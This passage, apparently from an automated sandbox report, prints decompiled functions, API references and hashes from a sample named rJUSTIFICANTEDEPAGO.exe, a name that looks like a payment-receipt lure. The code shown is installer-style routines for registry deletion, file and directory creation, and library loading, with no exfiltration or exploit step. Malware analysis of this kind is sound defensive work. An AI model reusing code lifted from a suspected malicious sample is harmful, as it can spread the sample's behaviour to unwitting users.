                                        					_t6 = _t17 * 0x1c +  *0x7a8a70;
                                        					if( *_t6 == 1) {
                                        						break;
                                        					}
                                        					_push(_t6); // executed
                                        					_t8 = E00401434(); // executed
                                        					if(_t8 == 0x7fffffff) {
                                        						return 0x7fffffff;
                                        					}
                                        					_t10 = E0040136D(_t8);
                                        					if(_t10 != 0) {
                                        						_t11 = _t10 - 1;
                                        						_t16 = _t17;
                                        						_t17 = _t11;
                                        						_t12 = _t11 - _t16;
                                        					} else {
                                        						_t12 = _t10 + 1;
                                        						_t17 = _t17 + 1;
                                        					}
                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                        						 *0x7a7a0c =  *0x7a7a0c + _t12;
                                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a0c, 0x7530,  *0x7a79f4), 0); // executed
                                        					}
                                        				}
                                        				return 0;
                                        			}











                                        0x0040138a
                                        0x004013fa
                                        0x0040139b
                                        0x004013a0
                                        0x00000000
                                        0x00000000
                                        0x004013a2
                                        0x004013a3
                                        0x004013ad
                                        0x00000000
                                        0x00401404
                                        0x004013b0
                                        0x004013b7
                                        0x004013bd
                                        0x004013be
                                        0x004013c0
                                        0x004013c2
                                        0x004013b9
                                        0x004013b9
                                        0x004013ba
                                        0x004013ba
                                        0x004013c9
                                        0x004013cb
                                        0x004013f4
                                        0x004013f4
                                        0x004013c9
                                        0x00000000

                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                        • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                        • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                        • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402388(void* __ebx) {
                                        				void* _t10;
                                        				void* _t14;
                                        				long _t18;
                                        				intOrPtr _t20;
                                        				void* _t22;
                                        				void* _t23;
                                        
                                        				_t14 = __ebx;
                                        				_t26 =  *(_t23 - 0x18) - __ebx;
                                        				_t20 =  *((intOrPtr*)(_t23 - 0x24));
                                        				if( *(_t23 - 0x18) != __ebx) {
                                        					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
                                        					goto L4;
                                        				} else {
                                        					_t10 = E00402C77(_t26, 2); // executed
                                        					_t22 = _t10;
                                        					if(_t22 == __ebx) {
                                        						L6:
                                        						 *((intOrPtr*)(_t23 - 4)) = 1;
                                        					} else {
                                        						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
                                        						RegCloseKey(_t22);
                                        						L4:
                                        						if(_t18 != _t14) {
                                        							goto L6;
                                        						}
                                        					}
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
                                        				return 0;
                                        			}









                                        0x00402388
                                        0x00402388
                                        0x0040238b
                                        0x0040238e
                                        0x004023cf
                                        0x00000000
                                        0x00402390
                                        0x00402392
                                        0x00402397
                                        0x0040239b
                                        0x00402885
                                        0x00402885
                                        0x004023a1
                                        0x004023b1
                                        0x004023b3
                                        0x004023d1
                                        0x004023d3
                                        0x00000000
                                        0x004023d9
                                        0x004023d3
                                        0x0040239b
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023AA
                                        • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: 336ee21dce7fe236a01c35d47a8697e130fb3ea5dcd58a3cb6936f6497ca76ff
                                        • Instruction ID: 4b991d54845a8f4c2efe32c9125b9baad4d8851bb675889a970d9a4240a8a0e2
                                        • Opcode Fuzzy Hash: 336ee21dce7fe236a01c35d47a8697e130fb3ea5dcd58a3cb6936f6497ca76ff
                                        • Instruction Fuzzy Hash: 23F0F632A041149BE710BBA49B4EABEB2A5AB44354F16003FFA02F31C1CEFC4D01876D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401573(void* __ebx) {
                                        				int _t4;
                                        				void* _t9;
                                        				struct HWND__* _t11;
                                        				struct HWND__* _t12;
                                        				void* _t16;
                                        
                                        				_t9 = __ebx;
                                        				_t11 =  *0x7a79f0; // 0x20390
                                        				if(_t11 != __ebx) {
                                        					ShowWindow(_t11,  *(_t16 - 0x24)); // executed
                                        					_t4 =  *(_t16 - 0x28);
                                        				}
                                        				_t12 =  *0x7a7a04; // 0x1038a
                                        				if(_t12 != _t9) {
                                        					ShowWindow(_t12, _t4); // executed
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
                                        				return 0;
                                        			}








                                        0x00401573
                                        0x00401573
                                        0x00401581
                                        0x00401587
                                        0x00401589
                                        0x00401589
                                        0x0040158c
                                        0x00401594
                                        0x0040159c
                                        0x0040159c
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • ShowWindow.USER32(00020390,?), ref: 00401587
                                        • ShowWindow.USER32(0001038A), ref: 0040159C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: e9d257a11957cecfd478a70c41151f4352c91d381a98e1f3aa8ce5a0ad929688
                                        • Instruction ID: 5269699cd9b299489618f1bbb9ba152c7ba26c22ef46d1a8c5e364d85c2f5657
                                        • Opcode Fuzzy Hash: e9d257a11957cecfd478a70c41151f4352c91d381a98e1f3aa8ce5a0ad929688
                                        • Instruction Fuzzy Hash: B5E086777041049FCB19DBA8ED808AE77A6FB85310718457FE502F3690CA79AD50CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00406639(signed int _a4) {
                                        				struct HINSTANCE__* _t5;
                                        				signed int _t10;
                                        
                                        				_t10 = _a4 << 3;
                                        				_t8 =  *(_t10 + 0x40a3e0);
                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                        				if(_t5 != 0) {
                                        					L2:
                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                        				}
                                        				_t5 = E004065C9(_t8); // executed
                                        				if(_t5 == 0) {
                                        					return 0;
                                        				}
                                        				goto L2;
                                        			}





                                        0x00406641
                                        0x00406644
                                        0x0040664b
                                        0x00406653
                                        0x0040665f
                                        0x00000000
                                        0x00406666
                                        0x00406656
                                        0x0040665d
                                        0x00000000
                                        0x0040666e
                                        0x00000000

                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                          • Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                          • Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
                                          • Part of subcall function 004065C9: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                        • Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
                                        • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                        • Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00405D51(WCHAR* _a4, long _a8, long _a12) {
                                        				signed int _t5;
                                        				void* _t6;
                                        
                                        				_t5 = GetFileAttributesW(_a4); // executed
                                        				asm("sbb ecx, ecx");
                                        				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                        				return _t6;
                                        			}





                                        0x00405d55
                                        0x00405d62
                                        0x00405d77
                                        0x00405d7d

                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                        • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                        • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                        • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405D2C(WCHAR* _a4) {
                                        				signed char _t3;
                                        				signed char _t7;
                                        
                                        				_t3 = GetFileAttributesW(_a4); // executed
                                        				_t7 = _t3;
                                        				if(_t7 != 0xffffffff) {
                                        					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                        				}
                                        				return _t7;
                                        			}





                                        0x00405d31
                                        0x00405d37
                                        0x00405d3c
                                        0x00405d45
                                        0x00405d45
                                        0x00405d4e

                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,00405931,?,?,00000000,00405B07,?,?,?,?), ref: 00405D31
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D45
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                        • Instruction ID: 706934cb3b0fb70b74806e5ec6ddb1c8dfd6769152cd575e6ec3c276ff28a2a3
                                        • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                        • Instruction Fuzzy Hash: 85D01272504420AFD6512738EF0C89BBF95DB543717028B36FAE9A22F0CB304C568A98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040580F(WCHAR* _a4) {
                                        				int _t2;
                                        
                                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                                        				if(_t2 == 0) {
                                        					return GetLastError();
                                        				}
                                        				return 0;
                                        			}




                                        0x00405815
                                        0x0040581d
                                        0x00000000
                                        0x00405823
                                        0x00000000

                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                        • Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
                                        • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                        • Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E004027E9(intOrPtr __edx, void* __eflags) {
                                        				long _t8;
                                        				long _t10;
                                        				LONG* _t12;
                                        				void* _t14;
                                        				intOrPtr _t15;
                                        				void* _t17;
                                        				void* _t19;
                                        
                                        				_t15 = __edx;
                                        				_push(ds);
                                        				if(__eflags != 0) {
                                        					_t8 = E00402C15(2);
                                        					_pop(_t14);
                                        					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                        					_t10 = SetFilePointer(E004061BF(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                        					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                        						_push(_t10);
                                        						_push( *((intOrPtr*)(_t19 - 0xc)));
                                        						E004061A6();
                                        					}
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t19 - 4));
                                        				return 0;
                                        			}










                                        0x004027e9
                                        0x004027e9
                                        0x004027ea
                                        0x004027f2
                                        0x004027f7
                                        0x004027f8
                                        0x00402807
                                        0x00402810
                                        0x00402a61
                                        0x00402a62
                                        0x00402a65
                                        0x00402a65
                                        0x00402810
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                          • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
